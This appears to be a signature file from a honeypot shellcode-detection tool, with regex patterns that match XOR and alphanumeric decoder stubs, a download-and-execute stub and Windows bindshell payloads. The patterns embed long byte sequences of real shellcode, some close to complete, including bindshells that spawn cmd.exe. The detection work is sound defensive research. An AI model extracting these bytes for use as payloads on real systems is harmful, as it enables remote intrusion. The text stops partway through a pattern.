/* $Id: shellcode-signatures.sc 1371 2007-09-07 11:45:06Z common $ */

/*
   =--- ShellcodeManager                                                      ---=
[n] [+]  0) GenericXOR generic XOR decoder
[n] [+]   1) GenericCreateProcess generic CreateProcess decoder
[n] [+]   2) GenericUrl generic Url decoder
[n] [+]   3) LinkXOR  link-bot XOR decoder
[n] [+]   4) GenericCMD generic CMD decoder
[n] [+]   5) LinkTrans handles linkbot/linkshellcode connectback transfers
[n] [+]   6) LinkBindTrans handles linkbot/linkshellcode bind transfers
[n] [+]   7) Stuttgart handles "stuttgart" shellcode
[s] [ ]   8) Wuerzburg handles "wuerzburg" shellcode
[n] [+]   9) GenericBind various bindshells
[n] [+]   10) GenericConnect various bindshells
[n] [ ]   11) KonstanzXOR Konstanz XOR decoder
[n] [+]   12) GenericConnectTrans various csends
[E] [+]   13) GenericUniCode generic UniCode decoder
[n] [+]   14) GenericWinExec generic WinExec decoder
[n] [ ]   15) LeimbachUrlXOR generic XOR decoder
[?] [ ]   16) Genericwget generic wget decoder
[n] [+]   17) ASN1IISBase64 handles oc192 dcom bindshell
[n] [+]   18) ASN1SMBBind handles oc192 dcom bindshell
[n] [+]   19) THCConnect handles thc iis connectbackshells
[?] [ ]   20) THCBind  handles thc iis bindshells
[n] [+]   21) HODBind  handles oc192 dcom bindshell
[n] [+]   22) HODConnect handles oc192 dcom bindshell
[n] [+]   23) HODBind  handles house of dabus msmq bindshells (xor::msfPexEnvSub & bindshell::schoenborn do the trick)
[n] [+]   24) HODBind  handles house of dabus netdde bindshells
[n] [+]   25) HODConnect handles house of dabus netdde bindshells
[n] [+]   26) MandragoreBind mandragore sasserftpd bondshells
[n] [+]   27) MandragoreConnect mandragore sasserftpd bondshells
[n] [+]   28) HATSQUADConnect handles hat-squad wins connect
[n] [+]   29) HATSQUADBind handles hat-squad wins bindshell
[n] [+]   30) ZUCConnect handles zuc wins connect ( dupe of 19))
   =--- 31 ShellcodeHandlers registerd  

*/

// taken from shellcode-generic/sch_generic_xor.cpp
xor::rbot64k
{
	pattern
	"(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5B\\x31\\xC9\\x66\\xB9(.)"
	"\\xFF\\x80\\x73\\x0E(.)\\x43\\xE2\\xF9)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};


xor::rbot256c
{

	pattern
	"(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5B\\x31\\xC9\\xB1(.)\\x80"
	"\\x73\\x0C(.)\\x43\\xE2\\xF9)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};

xor::bielefeld
{
	pattern
	"(.*)(\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9(..)\\x80\\x34\\x0A(.)\\xE2\\xFA"
	"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};

xor::halle
{
	pattern
	"(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5B\\x31\\xC9\\x66\\xB9(..)"
	"\\x80\\x73\\x0E(.)\\x43\\xE2\\xF9)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};


xor::adenau
{
	pattern
	"(.*)(\\xEB\\x19\\x5E\\x31\\xC9\\x81\\xE9(....)\\x81\\x36(....)\\x81\\xEE\\xFC"
	"\\xFF\\xFF\\xFF\\xE2\\xF2\\xEB\\x05\\xE8\\xE2\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,sizeinvert,key,post);
};



xor::kaltenborn
{
	pattern
	"(.*)(\\xEB\\x03\\x5D\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\x8B\\xC5\\x83\\xC0\\x11"
	"\\x33\\xC9\\x66\\xB9(..)\\x80\\x30(.)\\x40\\xE2\\xFA)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};

xor::deggendorf
{
	pattern
	"(.*)(\\xEB\\x10\\x5A\\x4A\\x31\\xC9\\x66\\xB9\(..)\\x80\\x34\\x0A(.)\\xE2\\xFA"
	"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post); 
};


xor::langenfeld
{
	pattern
	"(.*)(\\xEB\\x0F\\x5B\\x33\\xC9\\x66\\xB9(..)\\x80\\x33(.)\\x43\\xE2\\xFA\\xEB"
	"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post);     
};

xor::saalfeld
{
	pattern
	"(.*)(\\xEB\\x03\\x5D\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\x83\\xC5\\x15\\x90\\x90"
	"\\x90\\x8B\\xC5\\x33\\xC9\\x66\\xB9(..)\\x50\\x80\\x30(.)\\x40\\xE2\\xFA)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};  

xor::schoenberg
{
	pattern
	"(.*)(\\x31\\xC9\\x83\\xE9(.)\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13(....)"
	"\\x83\\xEB\\xFC\\xE2\\xF4)(.*)$";
	mapping (none,pre,decoder,sizeinvert,key,post);
};

xor::rosengarten
{
	pattern
	"(.*)(\\x33\\xC0\\xF7\\xD0\\x8B\\xFC\\xF2\\xAF\\x57\\x33\\xC9\\xB1(.)\\x90\\x90\\x90"
	"\\x90\\x80\\x37(.)\\x47\\xE2\\xFA.*\\xFF\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};

xor::schauenburg
{
	pattern
	"(.*)(\\xEB\\x0F\\x8B\\x34\\x24\\x33\\xC9\\x80\\xC1(.)\\x80\\x36(.)\\x46\\xE2\\xFA"
	"\\xC3\\xE8\\xEC\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post); 
};


xor::lichtenfels
{
	pattern
	"(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x58\\x83\\xC0\\x1B\\x8D\\xA0"
	"\\x01\\xFC\\xFF\\xFF\\x83\\xE4\\xFC\\x8B\\xEC\\x33\\xC9\\x66\\xB9(..)\\x80\\x30(.)"
	"\\x40\\xE2\\xFA)(.*)$";
	mapping (none,pre,decoder,size,key,post); 
};


xor::msfPexEnvSub
{
	pattern
	"(.*)(\\xC9\\x83\\xE9(.)\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13(....)\\x83"
	"\\xEB\\xFC\\xE2\\xF4)(.*)$";
	mapping (none,pre,decoder,sizeinvert,key,post);
};


xor::msfPex
{

	pattern
	"(.*)(\\x2B\\xC9\\x83\\xE9(.)\\xE8\\xFF\\xFF\\xFF\\xFF\\xC0\\x5E\\x81\\x76\\x0E(....)"
	"\\x83\\xEE\\xFC\\xE2\\xF4)(.*)$";
	mapping (none,pre,decoder,sizeinvert,key,post);
};


xor::leimbach
{
	pattern
	"(.*)(\\xEB\\x0E\\x5B\\x4B\\x33\\xC9\\xB1(.)\\x80\\x34\\x0B(.)\\xE2\\xFA\\xEB\\x05\\xE8"
	"\\xED\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post); 
};

xor::marburganderlahn
{
	pattern
	"(.*)(\\xEB\\x0E\\x5A\\x4A\\x31\\xC9\\xB1(.)\\x80\\x34\\x11(.)\\xE2\\xFA\\xEB\\x05\\xE8\\xED\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};

/*
 * too inaccurate
 * 
xor::mwcollect
{
	pattern
	"(.*)(\\xEB.\\xEB.\\xE8.*\\xB1(.).*\\x80..(.).*\\xE2.)(.*)$";
	mapping (none,pre,decoder,size,key,post);
};
*/

xor::hod
{
	pattern
	"(.*)(\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9(..)\\x80\\x34\\x0B(.)\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF)(.*)$";
	
	mapping (none,pre,decoder,size,key,post);
};

/* skylined alphanumeric decoder */
alphanumericxor::skylined
{
    pattern
	"(.*)(VTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOM(.*)Z)(.*$)";
	mapping(none,pre,decoder,payload,post);
};



/* metasploit alphanumeric decoder */
alphanumericxor::msfPexAlphaNum
{
    pattern
	"(.*)(VTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOM(.*)Z)(.*$)";
	mapping(none,pre,decoder,payload,post);
};

/*
wuerzburgxor::wuerzburg
{
 
// this xor chain sucks hard

	pattern
	"(.*\\xEB\\x27......)(\\x5D\\x33\\xC9\\x66\\xB9(..)\\x8D\\x75\\x05\\x8B\\xFE\\x8A"
	"\\x06\\x3C(.)\\x75\\x05\\x46\\x8A\\x06\\x2C(.)\\x46\\x34(.)\\x88\\x07\\x47\\xE2\\xED\\xEB\\x0A\\xE8"
	"\\xDA\\xFF\\xFF\\xFF)(.*)$";
	mapping (none,pre,decoder,size,key,subkey,none,post);
};
*/
	


// taken from shellcode-generic/sch_generic_linkxor.cpp

linkxor::link
{

/*
 * look at the source for information
 *
 */
	pattern
	"\\xEB\\x15\\xB9(....)\\x81\\xF1(....)\\x5E\\x80\\x74\\x31\\xFF(.)\\xE2\\xF9\\xEB\\x05\\xE8\\xE6\\xFF\\xFF\\xFF(.*)";
	mapping (none,size,size,key,post);
};

// taken from shellcode-generic/sch_generic_konstanz_xor.cpp
konstanzxor::konstanz
{
/*
 * xor key is index
 *
 */
	pattern
	"\\x33\\xC9\\x66\\xB9(..)\\xE8\\xFF\\xFF\\xFF\\xFF\\xC1\\x5E\\x30\\x4C\\x0E\\x07\\xE2\\xFA(.*)";
	mapping (none,size,post);
};


// taken from shellcode-generic/sch_generic_leimbach_url_xor.cpp

leimbachxor::leimbach
{   
	pattern
	"(.*)(\\xE9\\xBF\\x00\\x00\\x00\\x5F\\x64\\xA1\\x30\\x00\\x00\\x00\\x8B\\x40\\x0C\\x8B\\x70\\x1C"
	"\\xAD\\x8B\\x68\\x08\\x8B\\xF7\\x6A\\x03\\x59\\xE8\\x5F\\x00\\x00\\x00\\xE2\\xF9\\x68\\x6F\\x6E"
	"\\x00\\x00\\x68\\x75\\x72\\x6C\\x6D\\x54\\xFF\\x16\\x8B\\xE8\\xE8\\x49\\x00\\x00\\x00\\x8B\\xFE"
	"\\x83\\xC7\\x10\\x57\\x80\\x37(.)\\x47\\x80\\x3F(.)\\x75\\xF7\\x80\\x37\\x11\\x5F\\x83\\xEC\\x14"
	"\\x68\\x65\\x78\\x65\\x00\\x68\\x6F\\x73\\x74\\x2E\\x68\\x73\\x76\\x63\\x68\\x68\\x65\\x72\\x73"
	"\\x5C\\x68\\x64\\x72\\x69\\x76\\x8B\\xDC\\x33\\xC0\\x50\\x50\\x53\\x57\\x50\\xFF\\x56\\x0C\\x85"
	"\\xC0\\x75\\x07\\x8B\\xDC\\x50\\x53\\xFF\\x56\\x04\\xFF\\x56\\x08\\x51\\x56\\x8B\\x45\\x3C\\x8B"
	"\\x54\\x28\\x78\\x03\\xD5\\x52\\x8B\\x72\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x03\\xC5\\x33"
	"\\xDB\\x0F\\xBE\\x10\\x3A\\xD6\\x74\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xF1\\x3B\\x1F\\x75"
	"\\xE7\\x5A\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04\\x8B"
	"\\x03\\xC5\\xAB\\x5E\\x59\\xC3\\xE8\\x3C\\xFF\\xFF\\xFF................)(.*)$";

	mapping (key,key);
};



// taken from shellcode-generic/shellcode-generic.conf.dist


bindshell::mainz
{
	pattern
	"\\x50\\x50\\x50\\x50\\x6A\\x01\\x6A\\x02\\xFF\\x57\\xEC\\x8B\\xD8\\xC7\\x07\\x02\\x00(..)\\x33\\xC0"
	"\\x89\\x47\\x04\\x6A\\x10\\x57\\x53\\xFF\\x57\\xF0\\x6A\\x01\\x53\\xFF\\x57\\xF4\\x50\\x50\\x53\\xFF"
	"\\x57\\xF8";

	mapping (none,port);
};

bindshell::adenau
{
	pattern 

"\\x83\\xEC\\x34\\x8B\\xF4\\xE8\\x47\\x01\\x00\\x00\\x89\\x06\\xFF\\x36\\x68\\x8E\\x4E\\x0E"
"\\xEC\\xE8\\x61\\x01\\x00\\x00\\x89\\x46\\x08\\xFF\\x36\\x68\\xAD\\xD9\\x05\\xCE\\xE8\\x52"
"\\x01\\x00\\x00\\x89\\x46\\x0C\\x68\\x6C\\x6C\\x00\\x00\\x68\\x33\\x32\\x2E\\x64\\x68\\x77"
"\\x73\\x32\\x5F\\x54\\xFF\\x56\\x08\\x89\\x46\\x04\\xFF\\x36\\x68\\x72\\xFE\\xB3\\x16\\xE8"
"\\x2D\\x01\\x00\\x00\\x89\\x46\\x10\\xFF\\x36\\x68\\x7E\\xD8\\xE2\\x73\\xE8\\x1E\\x01\\x00"
"\\x00\\x89\\x46\\x14\\xFF\\x76\\x04\\x68\\xCB\\xED\\xFC\\x3B\\xE8\\x0E\\x01\\x00\\x00\\x89"
"\\x46\\x18\\xFF\\x76\\x04\\x68\\xD9\\x09\\xF5\\xAD\\xE8\\xFE\\x00\\x00\\x00\\x89\\x46\\x1C"
"\\xFF\\x76\\x04\\x68\\xA4\\x1A\\x70\\xC7\\xE8\\xEE\\x00\\x00\\x00\\x89\\x46\\x20\\xFF\\x76"
"\\x04\\x68\\xA4\\xAD\\x2E\\xE9\\xE8\\xDE\\x00\\x00\\x00\\x89\\x46\\x24\\xFF\\x76\\x04\\x68"
"\\xE5\\x49\\x86\\x49\\xE8\\xCE\\x00\\x00\\x00\\x89\\x46\\x28\\xFF\\x76\\x04\\x68\\xE7\\x79"
"\\xC6\\x79\\xE8\\xBE\\x00\\x00\\x00\\x89\\x46\\x2C\\x33\\xFF\\x81\\xEC\\x90\\x01\\x00\\x00"
"\\x54\\x68\\x01\\x01\\x00\\x00\\xFF\\x56\\x18\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF"
"\\x56\\x1C\\x8B\\xD8\\x57\\x57\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x16\\x51\\x53\\xFF\\x56"
"\\x20\\x57\\x53\\xFF\\x56\\x24\\x57\\x51\\x53\\xFF\\x56\\x28\\x8B\\xD0\\x68\\x65\\x78\\x65"
"\\x00\\x68\\x63\\x6D\\x64\\x2E\\x89\\x66\\x30\\x83\\xEC\\x54\\x8D\\x3C\\x24\\x33\\xC0";


/*
	"\\x83\\xEC\\x34\\x8B\\xF4\\xE8\\x47\\x01\\x00\\x00\\x89\\x06\\xFF\\x36\\x68\\x8E\\x4E\\x0E\\xEC\\xE8"
	"\\x61\\x01\\x00\\x00\\x89\\x46\\x08\\xFF\\x36\\x68\\xAD\\xD9\\x05\\xCE\\xE8\\x52\\x01\\x00\\x00\\x89"
	"\\x46\\x0C\\x68\\x6C\\x6C\\x00\\x00\\x68\\x33\\x32\\x2E\\x64\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x56"
	"\\x08\\x89\\x46\\x04\\xFF\\x36\\x68\\x72\\xFE\\xB3\\x16\\xE8\\x2D\\x01\\x00\\x00\\x89\\x46\\x10\\xFF"
	"\\x36\\x68\\x7E\\xD8\\xE2\\x73\\xE8\\x1E\\x01\\x00\\x00\\x89\\x46\\x14\\xFF\\x76\\x04\\x68\\xCB\\xED"
	"\\xFC\\x3B\\xE8\\x0E\\x01\\x00\\x00\\x89\\x46\\x18\\xFF\\x76\\x04\\x68\\xD9\\x09\\xF5\\xAD\\xE8\\xFE"
	"\\x00\\x00\\x00\\x89\\x46\\x1C\\xFF\\x76\\x04\\x68\\xA4\\x1A\\x70\\xC7\\xE8\\xEE\\x00\\x00\\x00\\x89"
	"\\x46\\x20\\xFF\\x76\\x04\\x68\\xA4\\xAD\\x2E\\xE9\\xE8\\xDE\\x00\\x00\\x00\\x89\\x46\\x24\\xFF\\x76"
	"\\x04\\x68\\xE5\\x49\\x86\\x49\\xE8\\xCE\\x00\\x00\\x00\\x89\\x46\\x28\\xFF\\x76\\x04\\x68\\xE7\\x79"
	"\\xC6\\x79\\xE8\\xBE\\x00\\x00\\x00\\x89\\x46\\x2C\\x33\\xFF\\x81\\xEC\\x90\\x01\\x00\\x00\\x54\\x68"
	"\\x01\\x01\\x00\\x00\\xFF\\x56\\x18\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x56\\x1C\\x8B\\xD8"
	"\\x57\\x57\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x16\\x51\\x53\\xFF\\x56\\x20\\x57\\x53\\xFF\\x56\\x24"
	"\\x57\\x51\\x53\\xFF\\x56\\x28\\x8B\\xD0\\x68\\x65\\x78\\x65\\x00\\x68\\x63\\x6D\\x64\\x2E\\x89\\x66"
	"\\x30\\x83\\xEC\\x54\\x8D\\x3C\\x24\\x33\\xC0";
*/
	mapping (none,port);
};

bindshell::kaltenborn
{
	pattern     
	"\\xFF\\x56\\xF4\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x56\\xF0\\x8B\\xD8\\x57\\x57\\x68\\x02"
	"\\x00(..)\\x8B\\xCC\\x6A\\x16\\x51\\x53\\xFF\\x56\\xEC\\x57\\x53\\xFF\\x56\\xE8\\x33\\xFF\\x57\\x51"
	"\\x53\\xFF\\x56\\xE2\\x8B\\xD0\\x89\\x46\\xBE\\x68\\x63\\x6D\\x64\\x00\\x89\\x66\\xC2\\x83\\xC4\\xAC"
	"\\x8D\\x3C\\x24\\x33\\xC0\\x33\\xC9\\x80\\xC1\\x15\\xAB\\xE2\\xFD\\xC6\\x44\\x24\\x10\\x44\\xFE\\x44"
	"\\x24\\x3D\\x89\\x54\\x24\\x48\\x89\\x54\\x24\\x4C\\x89\\x54\\x24\\x50\\x8D\\x44\\x24\\x10\\x54\\x50"
	"\\x51\\x51\\x51\\x41\\x51\\x49\\x51\\x51\\xFF\\x76\\xC2\\x51\\xFF\\x56\\xCE\\x8B\\xCC\\x6A\\xFF\\xFF"
	"\\x31\\xFF\\x56\\xD2\\x8B\\xC8\\xFF\\x76\\xBE\\xFF\\x56\\xD6\\xEB\\x9E\\xFF\\x56\\x14";

	mapping (none,port);
};

bindshell::wackerow
{
	pattern     
	"\\xE8\\x7C\\x00\\x00\\x00\\x83\\xC6\\x0D\\x52\\x56\\xFF\\x57\\xFC\\x5A\\x8B\\xD8\\x6A\\x04\\x59\\xE8"
	"\\x69\\x00\\x00\\x00\\x50\\x50\\x50\\x50\\x6A\\x01\\x6A\\x02\\xFF\\x57\\xF0\\x8B\\xD8\\xC7\\x07\\x02"
	"\\x00(..)\\x33\\xC0\\x89\\x47\\x04\\x6A\\x10\\x57\\x53\\xFF\\x57\\xF4\\x6A\\x01\\x53\\xFF\\x57\\xF8"
	"\\x50\\x50\\x53\\xFF\\x57\\xFC\\x83\\xEC\\x44\\x8B\\xF4\\x33\\xDB\\x6A\\x10\\x59\\x89\\x1C\\x8E\\xE2"
	"\\xFB\\x89\\x46\\x38\\x89\\x46\\x3C\\x89\\x46\\x40\\xC7\\x46\\x2C\\x01\\x01\\x00\\x00\\x8D\\x47\\x10"
	"\\x50\\x56\\x53\\x53\\x53\\x6A\\x01\\x53\\x53\\xC7\\x47\\x3C\\x63\\x6D\\x64\\x00\\x8D\\x47\\x3C\\x50"
	"\\x53\\xFF\\x57\\xE4\\x50\\xFF\\x57\\xE8";

	mapping (none,port);
};

bindshell::parthenstein
{
	pattern             
	"\\xFF\\x56\\x18\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x56\\x1C\\x8B\\xD8\\x57\\x57\\x68\\x02"
	"\\x00(..)\\x8B\\xCC\\x6A\\x16\\x51\\x53\\xFF\\x56\\x20\\x57\\x53\\xFF\\x56\\x24\\x57\\x51\\x53\\xFF"
	"\\x56\\x28\\x8B\\xD0\\x68\\x65\\x78\\x65\\x00\\x68\\x63\\x6D\\x64\\x2E\\x89\\x66\\x30\\x83\\xEC\\x54"
	"\\x8D\\x3C\\x24\\x33\\xC0\\x33\\xC9\\x83\\xC1\\x15\\xAB\\xE2\\xFD\\xC6\\x44\\x24\\x10\\x44\\xFE\\x44"
	"\\x24\\x3D\\x89\\x54\\x24\\x48\\x89\\x54\\x24\\x4C\\x89\\x54\\x24\\x50\\x8D\\x44\\x24\\x10\\x54\\x50"
	"\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\xFF\\x76\\x30\\x51\\xFF\\x56\\x10\\x8B\\xCC\\x6A\\xFF\\xFF\\x31"
	"\\xFF\\x56\\x0C\\x8B\\xC8\\x57\\xFF\\x56\\x2C\\xFF\\x56\\x14";

	mapping (none,port);
};

bindshell::schoenborn
{
	pattern             
	"\\xFC\\x6A\\xEB\\x4D\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05"
	"\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99"
	"\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE5\\x8B\\x5F"
	"\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24\\x1C\\x61"
	"\\xC3\\x31\\xDB\\x64\\x8B\\x43\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\x68\\x8E"
	"\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0"
	"\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55\\x6A\\x02\\xFF"
	"\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0"
	"\\x66\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55"
	"\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55\\xFF\\xD0\\x68\\xE5\\x49\\x86\\x49\\x57"
	"\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57\\xFF\\xD6\\x55\\xFF\\xD0"
	"\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7\\x6A\\x44\\x89\\xE2"
	"\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE"
	"\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF"
	"\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x8B\\x57\\xFC\\x83\\xC4"
	"\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xEF\\xCE\\xE0\\x60\\x53\\xFF\\xD6\\xFF\\xD0";

	mapping (none,port); 
};

bindshell::ravensburg
{
	pattern             
	"\\xEB\\x23(..)\\x02\\x05\\x6C\\x59\\xF8\\x1D\\x9C\\xDE\\x8C\\xD1\\x4C\\x70\\xD4\\x03\\xF0\\x27\\x20"
	"\\x20\\x30\\x08\\x57\\x53\\x32\\x5F\\x33\\x32\\x2E\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF"
	"\\xFF\\x5D\\x83\\xED\\x2A\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78"
	"\\x08\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B\\x1C\\x01\\xF9\\x8B\\x53"
	"\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01\\xFB\\x31\\xC9\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B"
	"\\x01\\xFE\\xAC\\x31\\xC2\\xD1\\xE2\\x84\\xC0\\x75\\xF7\\x0F\\xB6\\x45\\x05\\x8D\\x44\\x45\\x04\\x66"
	"\\x39\\x10\\x75\\xE1\\x66\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E\\x10\\x41\\x0F\\xB7\\x0C"
	"\\x4A\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x05\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x05\\x75\\xBE\\xFE"
	"\\x4D\\x04\\x74\\x21\\xFE\\x4D\\x22\\x8D\\x5D\\x18\\x53\\xFF\\xD0\\x89\\xC7\\x6A\\x04\\x58\\x88\\x45"
	"\\x05\\x80\\x45\\x77\\x0A\\x8D\\x5D\\x74\\x80\\x6B\\x26\\x14\\xE9\\x78\\xFF\\xFF\\xFF\\x89\\xCE\\x31"
	"\\xDB\\x53\\x53\\x53\\x53\\x56\\x46\\x56\\xFF\\xD0\\x97\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57"
	"\\xFF\\x55\\xD4\\x4E\\x56\\x57\\xFF\\x55\\xCC\\x53\\x55\\x57\\xFF\\x55\\xD0\\x97\\x8D\\x45\\x88\\x50"
	"\\xFF\\x55\\xE4\\x55\\x55\\xFF\\x55\\xE8\\x8D\\x44\\x05\\x0C\\x94\\x53\\x68\\x2E\\x65\\x78\\x65\\x68"
	"\\x5C\\x63\\x6D\\x64\\x94\\x31\\xD2\\x8D\\x45\\xCC\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xC6\\x01\\xF2"
	"\\x52\\x94\\x8D\\x45\\x78\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE\\x52\\x53"
	"\\x53\\x53\\x55\\xFF\\x55\\xEC\\x6A\\xFF\\xFF\\x55\\xE0";

	mapping (none,port);
};

bindshell::schauenburg
{
	pattern             
	"\\xBE\\xCC\\x10\\xBE\\x77\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x15\\xD0\\x10"
	"\\xBE\\x77\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52\\xE8\\x0B\\x00\\x00\\x00\\x57\\x53\\x41"
	"\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x93\\x6A\\x00\\x68\\x02\\x00(..)"
	"\\x8B\\xC4\\x6A\\x10\\x50\\x53\\xE8\\x05\\x00\\x00\\x00\\x62\\x69\\x6E\\x64\\x00\\x57\\xFF\\x16\\xFF"
	"\\xD0\\x6A\\x01\\x53\\xE8\\x07\\x00\\x00\\x00\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x57\\xFF\\x16\\xFF"
	"\\xD0\\x6A\\x00\\x54\\x53\\xE8\\x07\\x00\\x00\\x00\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x57\\xFF\\x16"
	"\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x6A\\x10\\x59\\x8B\\xFC\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B\\x3C\\x24"
	"\\x50\\x50\\x50\\x6A\\x01\\x50\\x50\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D\\x64\\x00\\x50\\xE8\\x0F\\x00"
	"\\x00\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00\\xC6\\x07\\x44"
	"\\xC7\\x47\\x2C\\x01\\x01\\x00\\x00\\x83\\xC7\\x38\\x93\\xAB\\xAB\\xAB\\x64\\x67\\xA1\\x30\\x00\\x8B"
	"\\x40\\x0C\\x8B\\x40\\x1C\\x8B\\x00\\xFF\\x70\\x08\\xFF\\x16\\xFF\\xD0\\xEB";
	mapping (none,port);
};

bindshell::hatsquad_wins
{
	pattern
	"\\xFC\\x6A\\xEB\\x4F\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05"
	"\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31"
	"\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3"
